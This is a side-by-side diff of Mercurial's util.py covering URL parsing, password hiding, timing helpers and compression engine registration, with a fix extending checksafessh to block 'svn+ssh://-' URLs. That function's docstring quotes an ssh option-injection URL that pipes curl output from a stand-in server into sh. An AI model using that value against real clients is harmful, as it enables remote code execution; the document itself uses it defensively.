2668 self._hostport = ''
2669 self._origpath = path
2669 self._origpath = path
2670
2670
2671 if parsefragment and '#' in path:
2671 if parsefragment and '#' in path:
2672 path, self.fragment = path.split('#', 1)
2672 path, self.fragment = path.split('#', 1)
2673
2673
2674 # special case for Windows drive letters and UNC paths
2674 # special case for Windows drive letters and UNC paths
2675 if hasdriveletter(path) or path.startswith('\\\\'):
2675 if hasdriveletter(path) or path.startswith('\\\\'):
2676 self.path = path
2676 self.path = path
2677 return
2677 return
2678
2678
2679 # For compatibility reasons, we can't handle bundle paths as
2679 # For compatibility reasons, we can't handle bundle paths as
2680 # normal URLS
2680 # normal URLS
2681 if path.startswith('bundle:'):
2681 if path.startswith('bundle:'):
2682 self.scheme = 'bundle'
2682 self.scheme = 'bundle'
2683 path = path[7:]
2683 path = path[7:]
2684 if path.startswith('//'):
2684 if path.startswith('//'):
2685 path = path[2:]
2685 path = path[2:]
2686 self.path = path
2686 self.path = path
2687 return
2687 return
2688
2688
2689 if self._matchscheme(path):
2689 if self._matchscheme(path):
2690 parts = path.split(':', 1)
2690 parts = path.split(':', 1)
2691 if parts[0]:
2691 if parts[0]:
2692 self.scheme, path = parts
2692 self.scheme, path = parts
2693 self._localpath = False
2693 self._localpath = False
2694
2694
2695 if not path:
2695 if not path:
2696 path = None
2696 path = None
2697 if self._localpath:
2697 if self._localpath:
2698 self.path = ''
2698 self.path = ''
2699 return
2699 return
2700 else:
2700 else:
2701 if self._localpath:
2701 if self._localpath:
2702 self.path = path
2702 self.path = path
2703 return
2703 return
2704
2704
2705 if parsequery and '?' in path:
2705 if parsequery and '?' in path:
2706 path, self.query = path.split('?', 1)
2706 path, self.query = path.split('?', 1)
2707 if not path:
2707 if not path:
2708 path = None
2708 path = None
2709 if not self.query:
2709 if not self.query:
2710 self.query = None
2710 self.query = None
2711
2711
2712 # // is required to specify a host/authority
2712 # // is required to specify a host/authority
2713 if path and path.startswith('//'):
2713 if path and path.startswith('//'):
2714 parts = path[2:].split('/', 1)
2714 parts = path[2:].split('/', 1)
2715 if len(parts) > 1:
2715 if len(parts) > 1:
2716 self.host, path = parts
2716 self.host, path = parts
2717 else:
2717 else:
2718 self.host = parts[0]
2718 self.host = parts[0]
2719 path = None
2719 path = None
2720 if not self.host:
2720 if not self.host:
2721 self.host = None
2721 self.host = None
2722 # path of file:///d is /d
2722 # path of file:///d is /d
2723 # path of file:///d:/ is d:/, not /d:/
2723 # path of file:///d:/ is d:/, not /d:/
2724 if path and not hasdriveletter(path):
2724 if path and not hasdriveletter(path):
2725 path = '/' + path
2725 path = '/' + path
2726
2726
2727 if self.host and '@' in self.host:
2727 if self.host and '@' in self.host:
2728 self.user, self.host = self.host.rsplit('@', 1)
2728 self.user, self.host = self.host.rsplit('@', 1)
2729 if ':' in self.user:
2729 if ':' in self.user:
2730 self.user, self.passwd = self.user.split(':', 1)
2730 self.user, self.passwd = self.user.split(':', 1)
2731 if not self.host:
2731 if not self.host:
2732 self.host = None
2732 self.host = None
2733
2733
2734 # Don't split on colons in IPv6 addresses without ports
2734 # Don't split on colons in IPv6 addresses without ports
2735 if (self.host and ':' in self.host and
2735 if (self.host and ':' in self.host and
2736 not (self.host.startswith('[') and self.host.endswith(']'))):
2736 not (self.host.startswith('[') and self.host.endswith(']'))):
2737 self._hostport = self.host
2737 self._hostport = self.host
2738 self.host, self.port = self.host.rsplit(':', 1)
2738 self.host, self.port = self.host.rsplit(':', 1)
2739 if not self.host:
2739 if not self.host:
2740 self.host = None
2740 self.host = None
2741
2741
2742 if (self.host and self.scheme == 'file' and
2742 if (self.host and self.scheme == 'file' and
2743 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2743 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2744 raise Abort(_('file:// URLs can only refer to localhost'))
2744 raise Abort(_('file:// URLs can only refer to localhost'))
2745
2745
2746 self.path = path
2746 self.path = path
2747
2747
2748 # leave the query string escaped
2748 # leave the query string escaped
2749 for a in ('user', 'passwd', 'host', 'port',
2749 for a in ('user', 'passwd', 'host', 'port',
2750 'path', 'fragment'):
2750 'path', 'fragment'):
2751 v = getattr(self, a)
2751 v = getattr(self, a)
2752 if v is not None:
2752 if v is not None:
2753 setattr(self, a, urlreq.unquote(v))
2753 setattr(self, a, urlreq.unquote(v))
2754
2754
2755 def __repr__(self):
2755 def __repr__(self):
2756 attrs = []
2756 attrs = []
2757 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2757 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2758 'query', 'fragment'):
2758 'query', 'fragment'):
2759 v = getattr(self, a)
2759 v = getattr(self, a)
2760 if v is not None:
2760 if v is not None:
2761 attrs.append('%s: %r' % (a, v))
2761 attrs.append('%s: %r' % (a, v))
2762 return '<url %s>' % ', '.join(attrs)
2762 return '<url %s>' % ', '.join(attrs)
2763
2763
2764 def __bytes__(self):
2764 def __bytes__(self):
2765 r"""Join the URL's components back into a URL string.
2765 r"""Join the URL's components back into a URL string.
2766
2766
2767 Examples:
2767 Examples:
2768
2768
2769 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2769 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2770 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2770 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2771 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2771 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2772 'http://user:pw@host:80/?foo=bar&baz=42'
2772 'http://user:pw@host:80/?foo=bar&baz=42'
2773 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2773 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2774 'http://user:pw@host:80/?foo=bar%3dbaz'
2774 'http://user:pw@host:80/?foo=bar%3dbaz'
2775 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2775 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2776 'ssh://user:pw@[::1]:2200//home/joe#'
2776 'ssh://user:pw@[::1]:2200//home/joe#'
2777 >>> str(url('http://localhost:80//'))
2777 >>> str(url('http://localhost:80//'))
2778 'http://localhost:80//'
2778 'http://localhost:80//'
2779 >>> str(url('http://localhost:80/'))
2779 >>> str(url('http://localhost:80/'))
2780 'http://localhost:80/'
2780 'http://localhost:80/'
2781 >>> str(url('http://localhost:80'))
2781 >>> str(url('http://localhost:80'))
2782 'http://localhost:80/'
2782 'http://localhost:80/'
2783 >>> str(url('bundle:foo'))
2783 >>> str(url('bundle:foo'))
2784 'bundle:foo'
2784 'bundle:foo'
2785 >>> str(url('bundle://../foo'))
2785 >>> str(url('bundle://../foo'))
2786 'bundle:../foo'
2786 'bundle:../foo'
2787 >>> str(url('path'))
2787 >>> str(url('path'))
2788 'path'
2788 'path'
2789 >>> str(url('file:///tmp/foo/bar'))
2789 >>> str(url('file:///tmp/foo/bar'))
2790 'file:///tmp/foo/bar'
2790 'file:///tmp/foo/bar'
2791 >>> str(url('file:///c:/tmp/foo/bar'))
2791 >>> str(url('file:///c:/tmp/foo/bar'))
2792 'file:///c:/tmp/foo/bar'
2792 'file:///c:/tmp/foo/bar'
2793 >>> print url(r'bundle:foo\bar')
2793 >>> print url(r'bundle:foo\bar')
2794 bundle:foo\bar
2794 bundle:foo\bar
2795 >>> print url(r'file:///D:\data\hg')
2795 >>> print url(r'file:///D:\data\hg')
2796 file:///D:\data\hg
2796 file:///D:\data\hg
2797 """
2797 """
2798 if self._localpath:
2798 if self._localpath:
2799 s = self.path
2799 s = self.path
2800 if self.scheme == 'bundle':
2800 if self.scheme == 'bundle':
2801 s = 'bundle:' + s
2801 s = 'bundle:' + s
2802 if self.fragment:
2802 if self.fragment:
2803 s += '#' + self.fragment
2803 s += '#' + self.fragment
2804 return s
2804 return s
2805
2805
2806 s = self.scheme + ':'
2806 s = self.scheme + ':'
2807 if self.user or self.passwd or self.host:
2807 if self.user or self.passwd or self.host:
2808 s += '//'
2808 s += '//'
2809 elif self.scheme and (not self.path or self.path.startswith('/')
2809 elif self.scheme and (not self.path or self.path.startswith('/')
2810 or hasdriveletter(self.path)):
2810 or hasdriveletter(self.path)):
2811 s += '//'
2811 s += '//'
2812 if hasdriveletter(self.path):
2812 if hasdriveletter(self.path):
2813 s += '/'
2813 s += '/'
2814 if self.user:
2814 if self.user:
2815 s += urlreq.quote(self.user, safe=self._safechars)
2815 s += urlreq.quote(self.user, safe=self._safechars)
2816 if self.passwd:
2816 if self.passwd:
2817 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2817 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2818 if self.user or self.passwd:
2818 if self.user or self.passwd:
2819 s += '@'
2819 s += '@'
2820 if self.host:
2820 if self.host:
2821 if not (self.host.startswith('[') and self.host.endswith(']')):
2821 if not (self.host.startswith('[') and self.host.endswith(']')):
2822 s += urlreq.quote(self.host)
2822 s += urlreq.quote(self.host)
2823 else:
2823 else:
2824 s += self.host
2824 s += self.host
2825 if self.port:
2825 if self.port:
2826 s += ':' + urlreq.quote(self.port)
2826 s += ':' + urlreq.quote(self.port)
2827 if self.host:
2827 if self.host:
2828 s += '/'
2828 s += '/'
2829 if self.path:
2829 if self.path:
2830 # TODO: similar to the query string, we should not unescape the
2830 # TODO: similar to the query string, we should not unescape the
2831 # path when we store it, the path might contain '%2f' = '/',
2831 # path when we store it, the path might contain '%2f' = '/',
2832 # which we should *not* escape.
2832 # which we should *not* escape.
2833 s += urlreq.quote(self.path, safe=self._safepchars)
2833 s += urlreq.quote(self.path, safe=self._safepchars)
2834 if self.query:
2834 if self.query:
2835 # we store the query in escaped form.
2835 # we store the query in escaped form.
2836 s += '?' + self.query
2836 s += '?' + self.query
2837 if self.fragment is not None:
2837 if self.fragment is not None:
2838 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2838 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2839 return s
2839 return s
2840
2840
2841 __str__ = encoding.strmethod(__bytes__)
2841 __str__ = encoding.strmethod(__bytes__)
2842
2842
2843 def authinfo(self):
2843 def authinfo(self):
2844 user, passwd = self.user, self.passwd
2844 user, passwd = self.user, self.passwd
2845 try:
2845 try:
2846 self.user, self.passwd = None, None
2846 self.user, self.passwd = None, None
2847 s = bytes(self)
2847 s = bytes(self)
2848 finally:
2848 finally:
2849 self.user, self.passwd = user, passwd
2849 self.user, self.passwd = user, passwd
2850 if not self.user:
2850 if not self.user:
2851 return (s, None)
2851 return (s, None)
2852 # authinfo[1] is passed to urllib2 password manager, and its
2852 # authinfo[1] is passed to urllib2 password manager, and its
2853 # URIs must not contain credentials. The host is passed in the
2853 # URIs must not contain credentials. The host is passed in the
2854 # URIs list because Python < 2.4.3 uses only that to search for
2854 # URIs list because Python < 2.4.3 uses only that to search for
2855 # a password.
2855 # a password.
2856 return (s, (None, (s, self.host),
2856 return (s, (None, (s, self.host),
2857 self.user, self.passwd or ''))
2857 self.user, self.passwd or ''))
2858
2858
2859 def isabs(self):
2859 def isabs(self):
2860 if self.scheme and self.scheme != 'file':
2860 if self.scheme and self.scheme != 'file':
2861 return True # remote URL
2861 return True # remote URL
2862 if hasdriveletter(self.path):
2862 if hasdriveletter(self.path):
2863 return True # absolute for our purposes - can't be joined()
2863 return True # absolute for our purposes - can't be joined()
2864 if self.path.startswith(br'\\'):
2864 if self.path.startswith(br'\\'):
2865 return True # Windows UNC path
2865 return True # Windows UNC path
2866 if self.path.startswith('/'):
2866 if self.path.startswith('/'):
2867 return True # POSIX-style
2867 return True # POSIX-style
2868 return False
2868 return False
2869
2869
2870 def localpath(self):
2870 def localpath(self):
2871 if self.scheme == 'file' or self.scheme == 'bundle':
2871 if self.scheme == 'file' or self.scheme == 'bundle':
2872 path = self.path or '/'
2872 path = self.path or '/'
2873 # For Windows, we need to promote hosts containing drive
2873 # For Windows, we need to promote hosts containing drive
2874 # letters to paths with drive letters.
2874 # letters to paths with drive letters.
2875 if hasdriveletter(self._hostport):
2875 if hasdriveletter(self._hostport):
2876 path = self._hostport + '/' + self.path
2876 path = self._hostport + '/' + self.path
2877 elif (self.host is not None and self.path
2877 elif (self.host is not None and self.path
2878 and not hasdriveletter(path)):
2878 and not hasdriveletter(path)):
2879 path = '/' + path
2879 path = '/' + path
2880 return path
2880 return path
2881 return self._origpath
2881 return self._origpath
2882
2882
2883 def islocal(self):
2883 def islocal(self):
2884 '''whether localpath will return something that posixfile can open'''
2884 '''whether localpath will return something that posixfile can open'''
2885 return (not self.scheme or self.scheme == 'file'
2885 return (not self.scheme or self.scheme == 'file'
2886 or self.scheme == 'bundle')
2886 or self.scheme == 'bundle')
2887
2887
2888 def hasscheme(path):
2888 def hasscheme(path):
2889 return bool(url(path).scheme)
2889 return bool(url(path).scheme)
2890
2890
2891 def hasdriveletter(path):
2891 def hasdriveletter(path):
2892 return path and path[1:2] == ':' and path[0:1].isalpha()
2892 return path and path[1:2] == ':' and path[0:1].isalpha()
2893
2893
2894 def urllocalpath(path):
2894 def urllocalpath(path):
2895 return url(path, parsequery=False, parsefragment=False).localpath()
2895 return url(path, parsequery=False, parsefragment=False).localpath()
2896
2896
2897 def checksafessh(path):
2897 def checksafessh(path):
2898 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2898 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2899
2899
2900 This is a sanity check for ssh urls. ssh will parse the first item as
2900 This is a sanity check for ssh urls. ssh will parse the first item as
2901 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2901 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2902 Let's prevent these potentially exploited urls entirely and warn the
2902 Let's prevent these potentially exploited urls entirely and warn the
2903 user.
2903 user.
2904
2904
2905 Raises an error.Abort when the url is unsafe.
2905 Raises an error.Abort when the url is unsafe.
2906 """
2906 """
2907 path = urlreq.unquote(path)
2907 path = urlreq.unquote(path)
2908 if path.startswith('ssh://-') or '|' in path:
2908 if (path.startswith('ssh://-') or path.startswith('svn+ssh://-')
2909 or '|' in path):
2909 raise error.Abort(_('potentially unsafe url: %r') %
2910 raise error.Abort(_('potentially unsafe url: %r') %
2910 (path,))
2911 (path,))
2911
2912
2912 def hidepassword(u):
2913 def hidepassword(u):
2913 '''hide user credential in a url string'''
2914 '''hide user credential in a url string'''
2914 u = url(u)
2915 u = url(u)
2915 if u.passwd:
2916 if u.passwd:
2916 u.passwd = '***'
2917 u.passwd = '***'
2917 return bytes(u)
2918 return bytes(u)
2918
2919
2919 def removeauth(u):
2920 def removeauth(u):
2920 '''remove all authentication information from a url string'''
2921 '''remove all authentication information from a url string'''
2921 u = url(u)
2922 u = url(u)
2922 u.user = u.passwd = None
2923 u.user = u.passwd = None
2923 return str(u)
2924 return str(u)
2924
2925
2925 timecount = unitcountfn(
2926 timecount = unitcountfn(
2926 (1, 1e3, _('%.0f s')),
2927 (1, 1e3, _('%.0f s')),
2927 (100, 1, _('%.1f s')),
2928 (100, 1, _('%.1f s')),
2928 (10, 1, _('%.2f s')),
2929 (10, 1, _('%.2f s')),
2929 (1, 1, _('%.3f s')),
2930 (1, 1, _('%.3f s')),
2930 (100, 0.001, _('%.1f ms')),
2931 (100, 0.001, _('%.1f ms')),
2931 (10, 0.001, _('%.2f ms')),
2932 (10, 0.001, _('%.2f ms')),
2932 (1, 0.001, _('%.3f ms')),
2933 (1, 0.001, _('%.3f ms')),
2933 (100, 0.000001, _('%.1f us')),
2934 (100, 0.000001, _('%.1f us')),
2934 (10, 0.000001, _('%.2f us')),
2935 (10, 0.000001, _('%.2f us')),
2935 (1, 0.000001, _('%.3f us')),
2936 (1, 0.000001, _('%.3f us')),
2936 (100, 0.000000001, _('%.1f ns')),
2937 (100, 0.000000001, _('%.1f ns')),
2937 (10, 0.000000001, _('%.2f ns')),
2938 (10, 0.000000001, _('%.2f ns')),
2938 (1, 0.000000001, _('%.3f ns')),
2939 (1, 0.000000001, _('%.3f ns')),
2939 )
2940 )
2940
2941
2941 _timenesting = [0]
2942 _timenesting = [0]
2942
2943
2943 def timed(func):
2944 def timed(func):
2944 '''Report the execution time of a function call to stderr.
2945 '''Report the execution time of a function call to stderr.
2945
2946
2946 During development, use as a decorator when you need to measure
2947 During development, use as a decorator when you need to measure
2947 the cost of a function, e.g. as follows:
2948 the cost of a function, e.g. as follows:
2948
2949
2949 @util.timed
2950 @util.timed
2950 def foo(a, b, c):
2951 def foo(a, b, c):
2951 pass
2952 pass
2952 '''
2953 '''
2953
2954
2954 def wrapper(*args, **kwargs):
2955 def wrapper(*args, **kwargs):
2955 start = timer()
2956 start = timer()
2956 indent = 2
2957 indent = 2
2957 _timenesting[0] += indent
2958 _timenesting[0] += indent
2958 try:
2959 try:
2959 return func(*args, **kwargs)
2960 return func(*args, **kwargs)
2960 finally:
2961 finally:
2961 elapsed = timer() - start
2962 elapsed = timer() - start
2962 _timenesting[0] -= indent
2963 _timenesting[0] -= indent
2963 stderr.write('%s%s: %s\n' %
2964 stderr.write('%s%s: %s\n' %
2964 (' ' * _timenesting[0], func.__name__,
2965 (' ' * _timenesting[0], func.__name__,
2965 timecount(elapsed)))
2966 timecount(elapsed)))
2966 return wrapper
2967 return wrapper
2967
2968
2968 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2969 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2969 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2970 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2970
2971
2971 def sizetoint(s):
2972 def sizetoint(s):
2972 '''Convert a space specifier to a byte count.
2973 '''Convert a space specifier to a byte count.
2973
2974
2974 >>> sizetoint('30')
2975 >>> sizetoint('30')
2975 30
2976 30
2976 >>> sizetoint('2.2kb')
2977 >>> sizetoint('2.2kb')
2977 2252
2978 2252
2978 >>> sizetoint('6M')
2979 >>> sizetoint('6M')
2979 6291456
2980 6291456
2980 '''
2981 '''
2981 t = s.strip().lower()
2982 t = s.strip().lower()
2982 try:
2983 try:
2983 for k, u in _sizeunits:
2984 for k, u in _sizeunits:
2984 if t.endswith(k):
2985 if t.endswith(k):
2985 return int(float(t[:-len(k)]) * u)
2986 return int(float(t[:-len(k)]) * u)
2986 return int(t)
2987 return int(t)
2987 except ValueError:
2988 except ValueError:
2988 raise error.ParseError(_("couldn't parse size: %s") % s)
2989 raise error.ParseError(_("couldn't parse size: %s") % s)
2989
2990
2990 class hooks(object):
2991 class hooks(object):
2991 '''A collection of hook functions that can be used to extend a
2992 '''A collection of hook functions that can be used to extend a
2992 function's behavior. Hooks are called in lexicographic order,
2993 function's behavior. Hooks are called in lexicographic order,
2993 based on the names of their sources.'''
2994 based on the names of their sources.'''
2994
2995
2995 def __init__(self):
2996 def __init__(self):
2996 self._hooks = []
2997 self._hooks = []
2997
2998
2998 def add(self, source, hook):
2999 def add(self, source, hook):
2999 self._hooks.append((source, hook))
3000 self._hooks.append((source, hook))
3000
3001
3001 def __call__(self, *args):
3002 def __call__(self, *args):
3002 self._hooks.sort(key=lambda x: x[0])
3003 self._hooks.sort(key=lambda x: x[0])
3003 results = []
3004 results = []
3004 for source, hook in self._hooks:
3005 for source, hook in self._hooks:
3005 results.append(hook(*args))
3006 results.append(hook(*args))
3006 return results
3007 return results
3007
3008
3008 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3009 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3009 '''Yields lines for a nicely formatted stacktrace.
3010 '''Yields lines for a nicely formatted stacktrace.
3010 Skips the 'skip' last entries, then return the last 'depth' entries.
3011 Skips the 'skip' last entries, then return the last 'depth' entries.
3011 Each file+linenumber is formatted according to fileline.
3012 Each file+linenumber is formatted according to fileline.
3012 Each line is formatted according to line.
3013 Each line is formatted according to line.
3013 If line is None, it yields:
3014 If line is None, it yields:
3014 length of longest filepath+line number,
3015 length of longest filepath+line number,
3015 filepath+linenumber,
3016 filepath+linenumber,
3016 function
3017 function
3017
3018
3018 Not be used in production code but very convenient while developing.
3019 Not be used in production code but very convenient while developing.
3019 '''
3020 '''
3020 entries = [(fileline % (fn, ln), func)
3021 entries = [(fileline % (fn, ln), func)
3021 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3022 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3022 ][-depth:]
3023 ][-depth:]
3023 if entries:
3024 if entries:
3024 fnmax = max(len(entry[0]) for entry in entries)
3025 fnmax = max(len(entry[0]) for entry in entries)
3025 for fnln, func in entries:
3026 for fnln, func in entries:
3026 if line is None:
3027 if line is None:
3027 yield (fnmax, fnln, func)
3028 yield (fnmax, fnln, func)
3028 else:
3029 else:
3029 yield line % (fnmax, fnln, func)
3030 yield line % (fnmax, fnln, func)
3030
3031
3031 def debugstacktrace(msg='stacktrace', skip=0,
3032 def debugstacktrace(msg='stacktrace', skip=0,
3032 f=stderr, otherf=stdout, depth=0):
3033 f=stderr, otherf=stdout, depth=0):
3033 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3034 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3034 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3035 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3035 By default it will flush stdout first.
3036 By default it will flush stdout first.
3036 It can be used everywhere and intentionally does not require an ui object.
3037 It can be used everywhere and intentionally does not require an ui object.
3037 Not be used in production code but very convenient while developing.
3038 Not be used in production code but very convenient while developing.
3038 '''
3039 '''
3039 if otherf:
3040 if otherf:
3040 otherf.flush()
3041 otherf.flush()
3041 f.write('%s at:\n' % msg.rstrip())
3042 f.write('%s at:\n' % msg.rstrip())
3042 for line in getstackframes(skip + 1, depth=depth):
3043 for line in getstackframes(skip + 1, depth=depth):
3043 f.write(line)
3044 f.write(line)
3044 f.flush()
3045 f.flush()
3045
3046
3046 class dirs(object):
3047 class dirs(object):
3047 '''a multiset of directory names from a dirstate or manifest'''
3048 '''a multiset of directory names from a dirstate or manifest'''
3048
3049
3049 def __init__(self, map, skip=None):
3050 def __init__(self, map, skip=None):
3050 self._dirs = {}
3051 self._dirs = {}
3051 addpath = self.addpath
3052 addpath = self.addpath
3052 if safehasattr(map, 'iteritems') and skip is not None:
3053 if safehasattr(map, 'iteritems') and skip is not None:
3053 for f, s in map.iteritems():
3054 for f, s in map.iteritems():
3054 if s[0] != skip:
3055 if s[0] != skip:
3055 addpath(f)
3056 addpath(f)
3056 else:
3057 else:
3057 for f in map:
3058 for f in map:
3058 addpath(f)
3059 addpath(f)
3059
3060
3060 def addpath(self, path):
3061 def addpath(self, path):
3061 dirs = self._dirs
3062 dirs = self._dirs
3062 for base in finddirs(path):
3063 for base in finddirs(path):
3063 if base in dirs:
3064 if base in dirs:
3064 dirs[base] += 1
3065 dirs[base] += 1
3065 return
3066 return
3066 dirs[base] = 1
3067 dirs[base] = 1
3067
3068
3068 def delpath(self, path):
3069 def delpath(self, path):
3069 dirs = self._dirs
3070 dirs = self._dirs
3070 for base in finddirs(path):
3071 for base in finddirs(path):
3071 if dirs[base] > 1:
3072 if dirs[base] > 1:
3072 dirs[base] -= 1
3073 dirs[base] -= 1
3073 return
3074 return
3074 del dirs[base]
3075 del dirs[base]
3075
3076
3076 def __iter__(self):
3077 def __iter__(self):
3077 return iter(self._dirs)
3078 return iter(self._dirs)
3078
3079
3079 def __contains__(self, d):
3080 def __contains__(self, d):
3080 return d in self._dirs
3081 return d in self._dirs
3081
3082
3082 if safehasattr(parsers, 'dirs'):
3083 if safehasattr(parsers, 'dirs'):
3083 dirs = parsers.dirs
3084 dirs = parsers.dirs
3084
3085
3085 def finddirs(path):
3086 def finddirs(path):
3086 pos = path.rfind('/')
3087 pos = path.rfind('/')
3087 while pos != -1:
3088 while pos != -1:
3088 yield path[:pos]
3089 yield path[:pos]
3089 pos = path.rfind('/', 0, pos)
3090 pos = path.rfind('/', 0, pos)
3090
3091
3091 # compression code
3092 # compression code
3092
3093
3093 SERVERROLE = 'server'
3094 SERVERROLE = 'server'
3094 CLIENTROLE = 'client'
3095 CLIENTROLE = 'client'
3095
3096
3096 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3097 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3097 (u'name', u'serverpriority',
3098 (u'name', u'serverpriority',
3098 u'clientpriority'))
3099 u'clientpriority'))
3099
3100
3100 class compressormanager(object):
3101 class compressormanager(object):
3101 """Holds registrations of various compression engines.
3102 """Holds registrations of various compression engines.
3102
3103
3103 This class essentially abstracts the differences between compression
3104 This class essentially abstracts the differences between compression
3104 engines to allow new compression formats to be added easily, possibly from
3105 engines to allow new compression formats to be added easily, possibly from
3105 extensions.
3106 extensions.
3106
3107
3107 Compressors are registered against the global instance by calling its
3108 Compressors are registered against the global instance by calling its
3108 ``register()`` method.
3109 ``register()`` method.
3109 """
3110 """
3110 def __init__(self):
3111 def __init__(self):
3111 self._engines = {}
3112 self._engines = {}
3112 # Bundle spec human name to engine name.
3113 # Bundle spec human name to engine name.
3113 self._bundlenames = {}
3114 self._bundlenames = {}
3114 # Internal bundle identifier to engine name.
3115 # Internal bundle identifier to engine name.
3115 self._bundletypes = {}
3116 self._bundletypes = {}
3116 # Revlog header to engine name.
3117 # Revlog header to engine name.
3117 self._revlogheaders = {}
3118 self._revlogheaders = {}
3118 # Wire proto identifier to engine name.
3119 # Wire proto identifier to engine name.
3119 self._wiretypes = {}
3120 self._wiretypes = {}
3120
3121
3121 def __getitem__(self, key):
3122 def __getitem__(self, key):
3122 return self._engines[key]
3123 return self._engines[key]
3123
3124
3124 def __contains__(self, key):
3125 def __contains__(self, key):
3125 return key in self._engines
3126 return key in self._engines
3126
3127
3127 def __iter__(self):
3128 def __iter__(self):
3128 return iter(self._engines.keys())
3129 return iter(self._engines.keys())
3129
3130
3130 def register(self, engine):
3131 def register(self, engine):
3131 """Register a compression engine with the manager.
3132 """Register a compression engine with the manager.
3132
3133
3133 The argument must be a ``compressionengine`` instance.
3134 The argument must be a ``compressionengine`` instance.
3134 """
3135 """
3135 if not isinstance(engine, compressionengine):
3136 if not isinstance(engine, compressionengine):
3136 raise ValueError(_('argument must be a compressionengine'))
3137 raise ValueError(_('argument must be a compressionengine'))
3137
3138
3138 name = engine.name()
3139 name = engine.name()
3139
3140
3140 if name in self._engines:
3141 if name in self._engines:
3141 raise error.Abort(_('compression engine %s already registered') %
3142 raise error.Abort(_('compression engine %s already registered') %
3142 name)
3143 name)
3143
3144
3144 bundleinfo = engine.bundletype()
3145 bundleinfo = engine.bundletype()
3145 if bundleinfo:
3146 if bundleinfo:
3146 bundlename, bundletype = bundleinfo
3147 bundlename, bundletype = bundleinfo
3147
3148
3148 if bundlename in self._bundlenames:
3149 if bundlename in self._bundlenames:
3149 raise error.Abort(_('bundle name %s already registered') %
3150 raise error.Abort(_('bundle name %s already registered') %
3150 bundlename)
3151 bundlename)
3151 if bundletype in self._bundletypes:
3152 if bundletype in self._bundletypes:
3152 raise error.Abort(_('bundle type %s already registered by %s') %
3153 raise error.Abort(_('bundle type %s already registered by %s') %
3153 (bundletype, self._bundletypes[bundletype]))
3154 (bundletype, self._bundletypes[bundletype]))
3154
3155
3155 # No external facing name declared.
3156 # No external facing name declared.
3156 if bundlename:
3157 if bundlename:
3157 self._bundlenames[bundlename] = name
3158 self._bundlenames[bundlename] = name
3158
3159
3159 self._bundletypes[bundletype] = name
3160 self._bundletypes[bundletype] = name
3160
3161
3161 wiresupport = engine.wireprotosupport()
3162 wiresupport = engine.wireprotosupport()
3162 if wiresupport:
3163 if wiresupport:
3163 wiretype = wiresupport.name
3164 wiretype = wiresupport.name
3164 if wiretype in self._wiretypes:
3165 if wiretype in self._wiretypes:
3165 raise error.Abort(_('wire protocol compression %s already '
3166 raise error.Abort(_('wire protocol compression %s already '
3166 'registered by %s') %
3167 'registered by %s') %
3167 (wiretype, self._wiretypes[wiretype]))
3168 (wiretype, self._wiretypes[wiretype]))
3168
3169
3169 self._wiretypes[wiretype] = name
3170 self._wiretypes[wiretype] = name
3170
3171
3171 revlogheader = engine.revlogheader()
3172 revlogheader = engine.revlogheader()
3172 if revlogheader and revlogheader in self._revlogheaders:
3173 if revlogheader and revlogheader in self._revlogheaders:
3173 raise error.Abort(_('revlog header %s already registered by %s') %
3174 raise error.Abort(_('revlog header %s already registered by %s') %
3174 (revlogheader, self._revlogheaders[revlogheader]))
3175 (revlogheader, self._revlogheaders[revlogheader]))
3175
3176
3176 if revlogheader:
3177 if revlogheader:
3177 self._revlogheaders[revlogheader] = name
3178 self._revlogheaders[revlogheader] = name
3178
3179
3179 self._engines[name] = engine
3180 self._engines[name] = engine
3180
3181
3181 @property
3182 @property
3182 def supportedbundlenames(self):
3183 def supportedbundlenames(self):
3183 return set(self._bundlenames.keys())
3184 return set(self._bundlenames.keys())
3184
3185
3185 @property
3186 @property
3186 def supportedbundletypes(self):
3187 def supportedbundletypes(self):
3187 return set(self._bundletypes.keys())
3188 return set(self._bundletypes.keys())
3188
3189
3189 def forbundlename(self, bundlename):
3190 def forbundlename(self, bundlename):
3190 """Obtain a compression engine registered to a bundle name.
3191 """Obtain a compression engine registered to a bundle name.
3191
3192
3192 Will raise KeyError if the bundle type isn't registered.
3193 Will raise KeyError if the bundle type isn't registered.
3193
3194
3194 Will abort if the engine is known but not available.
3195 Will abort if the engine is known but not available.
3195 """
3196 """
3196 engine = self._engines[self._bundlenames[bundlename]]
3197 engine = self._engines[self._bundlenames[bundlename]]
3197 if not engine.available():
3198 if not engine.available():
